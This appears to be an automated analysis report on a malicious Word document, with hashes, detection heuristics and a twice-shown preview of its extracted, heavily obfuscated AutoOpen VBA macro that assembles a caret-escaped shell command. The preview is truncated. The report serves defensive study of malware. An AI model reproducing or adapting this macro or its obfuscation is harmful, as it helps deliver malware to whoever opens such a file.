Office (OLE) malware analysis — malicious · d7610008f1f0825a

MALICIOUS

Office (OLE)

268.5 KB Created: 2018-09-25 07:51:00 Authoring application: Microsoft Office Word First seen: 2018-10-19

MD5: 6178dc6d2ae04bda0f998dbca1564824 SHA-1: 55a31711c9849b8a72dc36e591734227707b7e79 SHA-256: d7610008f1f0825a0d6e0eba01ac358d9f553c19db572c42622b2c2e520331a9

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary code. The macro is likely responsible for downloading and executing a second-stage payload, though the exact mechanism is truncated.

Heuristics 6

ClamAV: Doc.Malware.00536d-6697203-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6697203-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 276331 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	276331 bytes
SHA-256: `70fbf46ee6a8f40c8ab42567e959c7fae2c7b01dd2d636de737ebab5d4d20994`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "iULVCpNAj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim fQcYPM(2) fQcYPM(0) = Left(FWFCaa + qOtpTfkIDPztaVohIDbiY + aKHSVtDE, 297) + MidB(sIzfT + zvafBUCRdqOkZFZBU + voKzkp, 294, 185) fQcYPM(1) = MidB(qVbJUuJ + TcaOBriHuGRQfbzDjimHA + KtbELQ, 203, 422) + Right(VaJGCifP + ZqzJiZKUjVajpjijpH + iiLLwi, 928) Dim VbDHI(2) VbDHI(0) = MidB(rMZMLVvG + qwhBRMsCOuDkBnHBnX + iPrci, 193, 583) + Left(GiYinHDl + GBzocXIioFYfmlaNii + uzFdE, 304) + Right(PvIzE + OEABvPuwlljVdYiqDqWuY + kpcWp, 773) + MidB(LIhjc + PHrTfKardPOdksKtfFFb + NLSPbwFv, 64, 518) VbDHI(1) = MidB(FMsJz + aatZSwFXPuKfvWSbKiJS + cHWzA, 422, 138) + Left(VXUlAQW + jIQkHjtCWfPQHTriZitnvw + wNHLoCml, 339) Dim znDGTl(2) znDGTl(0) = MidB(FPBUKZ + nnUUnkvjuLqMBWwruW + CLdUjw, 855, 947) + MidB(AwwwY + DHZZZtatzzNfLORIJMA + zZoLfXEw, 826, 488) znDGTl(1) = Right(CzcRXt + ujDIVnjiwFCHlcuvWvz + CPIOp, 828) + Mid(LCtNVj + nZiuUnHQcMczTBvGFiVp + mrFsO, 596, 470) + Left(iVRbo + sqNiKsBwAaaSjJki + XJzoX, 869) + MidB(dlHrwmi + zQwEuOEwrPlIrGUhQpm + VVOSi, 768, 507) Dim cDkTR(1) cDkTR(0) = MidB(spfhJzMT + zWzRUhsQRYqUOZQqTHUKd + dqZiRZ, 690, 55) + Right(TEIVr + COBVRQXvdcrVXHEC + zzGRhO, 560) Dim RzrMR(2) RzrMR(0) = MidB(IZfnPcP + iHzHNcvZEXqWpMEdzGowAJk + QXMqLj, 84, 609) + MidB(GoDRfN + lkTjOolppLwzcTJrhiq + oihpvpJ, 675, 139) + Left(ZBjIYEZr + SYdUcIVMIvwmHvqAfcr + tZcBTcE, 979) + Mid(WGDUS + NuODaPlYIjqjraaDfUBkDw + YdDaXT, 837, 281) RzrMR(1) = Left(aTJqc + VImVvIuOBTMGzpMu + LXrcimZ, 146) + Mid(rzQioqEd + jJRXClzUUdiolJsQVimUMc + dSHljZOB, 51, 101) + MidB(smFlZLI + YCvLNzVoFupsWBOJakGjaRY + AuBTCO, 98, 296) + MidB(WZtGNz + AQDXrQzuRWVuoQuDbmdRmD + jjdsjA, 616, 463) Dim OkRzz(1) OkRzz(0) = Right(sqDBVtUt + qRwMENriYAmPfRtGoUIqn + iamcAUSI, 956) + MidB(vJXdGPEu + YktPbmLhbJoFFGYfTG + jjjjL, 278, 880) swiCqfBjh (KeyString(owTuRWl + BhYvR + 10 + 8 + 3 + 12 + 34 + MBBjjKf + fWNJjX) + wUfMuOI + HskKjtf + KeyString(uGLwdS + mzXATdH + 11 + 10 + 4 + 14 + 38 + zBOSmsiA + pGvcinP) + mcbUhiLkzvp + UlXEPWHM + LFLGvVI + BMQfhJoT + LLAzPC + ToRwRGcqdN + Dkrzimi + bHUYprjjC + jUKWa + qAEBiwdG + AFsiUGmEVQ + wpQjilZVz + hiVHPYFCp + uDuiGKqp + GzoujqsArY + HbXwTL + vujzlulQMhH + icNww + YKqsNZ + DQhiG) Dim fVMDLu(1) fVMDLu(0) = MidB(cVjUunz + LMEZwlXUJBofdTOzriCbrW + znXIO, 330, 956) + Right(nWjkpj + MrwsMGiAbMIkMaahI + XijuatzP, 39) + MidB(rffqTk + zOplooaTJOBWkZLSfkLl + kthXVH, 809, 6) + Right(YhwsG + cFntBGFcHSBIQUDutww + BHjAmR, 370) Dim GjnPEL(1) GjnPEL(0) = MidB(psEMdfH + dzsGPZvlRjmiMWPP + svNYjAz, 194, 852) + Left(wCKYQ + KbTTuNuAazHQsfpihfYL + ziomzFwi, 462) + Mid(KZBzdi + KlBJSNWlGLmPujFOhUD + oOfLAiDw, 114, 730) + Mid(zUWZZ + cMSBbGQYUkFGMDiOWGC + dHSwOjo, 151, 723) Dim PAIjPm(2) PAIjPm(0) = Right(bKfrDAqn + WjTWMtzNCRbBcfNkFifEUP + iiFNdsS, 686) + Right(soPhRY + zICMMECjmrcwHQTHpo + tGQCZVY, 243) PAIjPm(1) = MidB(wPZiWRA + IfsvblJQwQckJFvBDh + kqBsEh, 895, 26) + Left(NbDAL + QRHOqJzAVQVtzGIFZs + WzJXWo, 420) End Sub Attribute VB_Name = "KijmWjmbLtz" Function mcbUhiLkzvp() KipaNFsin = "d " + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "V" + ":" + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "C" + CStr(Chr(1 + 5 + 1 + 4 + 23)) + "s" + "^" + "e^" + "t " + ";" + "^$" + "=" HQTnNGA = "^3" + "0" + "1^" + " ^" + "30" + "9" + "^" + " " + "^" + "0^" + "5" + "1" ASDTnDDVH = "^ " + "5" + "^1" + "9" + " " + "^5" + "91" + "^ " + "^1" Dim ifVPwB(2) ifVPwB(0) = MidB(OsoIn + oiaYtlBZEcwzjpkcA + sNWjS, 651, 544) + Right(SwCJc + FjwdvKqSGPJzdifpN + tDZdz, 195) ifVPwB(1) = Right(nWjUftD + itfNMSwhISTiStqtDSL + kTsZisR, 504) + Right(HUWwhk + RBwPJjzlCKvuEdsatRo + jMfRvuJJ, 943) + Left(HiUJIbcG + oWlkSVJNOdLEfwHrtAwIc + IiSRph, 535) + MidB(puhdYUzj + wapNEwPVPpOIMFrwZwjc + JwiSZ, 25, 285) Dim RqMtn(1) RqMtn(0) = Right(YJkBqtNf + XuSuzjXOOdWVmDUwOzUc + HZEbPR, 910) + Left(FwdaTHpD + VBnwwWiAZnDSYVpOwziGi + rltpZ, 909) D ... (truncated)

SHA-256: 70fbf46ee6a8f40c8ab42567e959c7fae2c7b01dd2d636de737ebab5d4d20994

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "iULVCpNAj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim fQcYPM(2)
fQcYPM(0) = Left(FWFCaa + qOtpTfkIDPztaVohIDbiY + aKHSVtDE, 297) + MidB(sIzfT + zvafBUCRdqOkZFZBU + voKzkp, 294, 185)
fQcYPM(1) = MidB(qVbJUuJ + TcaOBriHuGRQfbzDjimHA + KtbELQ, 203, 422) + Right(VaJGCifP + ZqzJiZKUjVajpjijpH + iiLLwi, 928)
   Dim VbDHI(2)
VbDHI(0) = MidB(rMZMLVvG + qwhBRMsCOuDkBnHBnX + iPrci, 193, 583) + Left(GiYinHDl + GBzocXIioFYfmlaNii + uzFdE, 304) + Right(PvIzE + OEABvPuwlljVdYiqDqWuY + kpcWp, 773) + MidB(LIhjc + PHrTfKardPOdksKtfFFb + NLSPbwFv, 64, 518)
VbDHI(1) = MidB(FMsJz + aatZSwFXPuKfvWSbKiJS + cHWzA, 422, 138) + Left(VXUlAQW + jIQkHjtCWfPQHTriZitnvw + wNHLoCml, 339)
   Dim znDGTl(2)
znDGTl(0) = MidB(FPBUKZ + nnUUnkvjuLqMBWwruW + CLdUjw, 855, 947) + MidB(AwwwY + DHZZZtatzzNfLORIJMA + zZoLfXEw, 826, 488)
znDGTl(1) = Right(CzcRXt + ujDIVnjiwFCHlcuvWvz + CPIOp, 828) + Mid(LCtNVj + nZiuUnHQcMczTBvGFiVp + mrFsO, 596, 470) + Left(iVRbo + sqNiKsBwAaaSjJki + XJzoX, 869) + MidB(dlHrwmi + zQwEuOEwrPlIrGUhQpm + VVOSi, 768, 507)
   Dim cDkTR(1)
cDkTR(0) = MidB(spfhJzMT + zWzRUhsQRYqUOZQqTHUKd + dqZiRZ, 690, 55) + Right(TEIVr + COBVRQXvdcrVXHEC + zzGRhO, 560)
   Dim RzrMR(2)
RzrMR(0) = MidB(IZfnPcP + iHzHNcvZEXqWpMEdzGowAJk + QXMqLj, 84, 609) + MidB(GoDRfN + lkTjOolppLwzcTJrhiq + oihpvpJ, 675, 139) + Left(ZBjIYEZr + SYdUcIVMIvwmHvqAfcr + tZcBTcE, 979) + Mid(WGDUS + NuODaPlYIjqjraaDfUBkDw + YdDaXT, 837, 281)
RzrMR(1) = Left(aTJqc + VImVvIuOBTMGzpMu + LXrcimZ, 146) + Mid(rzQioqEd + jJRXClzUUdiolJsQVimUMc + dSHljZOB, 51, 101) + MidB(smFlZLI + YCvLNzVoFupsWBOJakGjaRY + AuBTCO, 98, 296) + MidB(WZtGNz + AQDXrQzuRWVuoQuDbmdRmD + jjdsjA, 616, 463)
   Dim OkRzz(1)
OkRzz(0) = Right(sqDBVtUt + qRwMENriYAmPfRtGoUIqn + iamcAUSI, 956) + MidB(vJXdGPEu + YktPbmLhbJoFFGYfTG + jjjjL, 278, 880)
swiCqfBjh (KeyString(owTuRWl + BhYvR + 10 + 8 + 3 + 12 + 34 + MBBjjKf + fWNJjX) + wUfMuOI + HskKjtf + KeyString(uGLwdS + mzXATdH + 11 + 10 + 4 + 14 + 38 + zBOSmsiA + pGvcinP) + mcbUhiLkzvp + UlXEPWHM + LFLGvVI + BMQfhJoT + LLAzPC + ToRwRGcqdN + Dkrzimi + bHUYprjjC + jUKWa + qAEBiwdG + AFsiUGmEVQ + wpQjilZVz + hiVHPYFCp + uDuiGKqp + GzoujqsArY + HbXwTL + vujzlulQMhH + icNww + YKqsNZ + DQhiG)
   Dim fVMDLu(1)
fVMDLu(0) = MidB(cVjUunz + LMEZwlXUJBofdTOzriCbrW + znXIO, 330, 956) + Right(nWjkpj + MrwsMGiAbMIkMaahI + XijuatzP, 39) + MidB(rffqTk + zOplooaTJOBWkZLSfkLl + kthXVH, 809, 6) + Right(YhwsG + cFntBGFcHSBIQUDutww + BHjAmR, 370)
   Dim GjnPEL(1)
GjnPEL(0) = MidB(psEMdfH + dzsGPZvlRjmiMWPP + svNYjAz, 194, 852) + Left(wCKYQ + KbTTuNuAazHQsfpihfYL + ziomzFwi, 462) + Mid(KZBzdi + KlBJSNWlGLmPujFOhUD + oOfLAiDw, 114, 730) + Mid(zUWZZ + cMSBbGQYUkFGMDiOWGC + dHSwOjo, 151, 723)
   Dim PAIjPm(2)
PAIjPm(0) = Right(bKfrDAqn + WjTWMtzNCRbBcfNkFifEUP + iiFNdsS, 686) + Right(soPhRY + zICMMECjmrcwHQTHpo + tGQCZVY, 243)
PAIjPm(1) = MidB(wPZiWRA + IfsvblJQwQckJFvBDh + kqBsEh, 895, 26) + Left(NbDAL + QRHOqJzAVQVtzGIFZs + WzJXWo, 420)
End Sub


Attribute VB_Name = "KijmWjmbLtz"
Function mcbUhiLkzvp()
KipaNFsin = "d " + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "V" + ":" + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "C" + CStr(Chr(1 + 5 + 1 + 4 + 23)) + "s" + "^" + "e^" + "t " + ";" + "^$" + "="
HQTnNGA = "^3" + "0" + "1^" + " ^" + "30" + "9" + "^" + " " + "^" + "0^" + "5" + "1"
ASDTnDDVH = "^ " + "5" + "^1" + "9" + " " + "^5" + "91" + "^ " + "^1"
Dim ifVPwB(2)
ifVPwB(0) = MidB(OsoIn + oiaYtlBZEcwzjpkcA + sNWjS, 651, 544) + Right(SwCJc + FjwdvKqSGPJzdifpN + tDZdz, 195)
ifVPwB(1) = Right(nWjUftD + itfNMSwhISTiStqtDSL + kTsZisR, 504) + Right(HUWwhk + RBwPJjzlCKvuEdsatRo + jMfRvuJJ, 943) + Left(HiUJIbcG + oWlkSVJNOdLEfwHrtAwIc + IiSRph, 535) + MidB(puhdYUzj + wapNEwPVPpOIMFrwZwjc + JwiSZ, 25, 285)
   Dim RqMtn(1)
RqMtn(0) = Right(YJkBqtNf + XuSuzjXOOdWVmDUwOzUc + HZEbPR, 910) + Left(FwdaTHpD + VBnwwWiAZnDSYVpOwziGi + rltpZ, 909)
   D
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.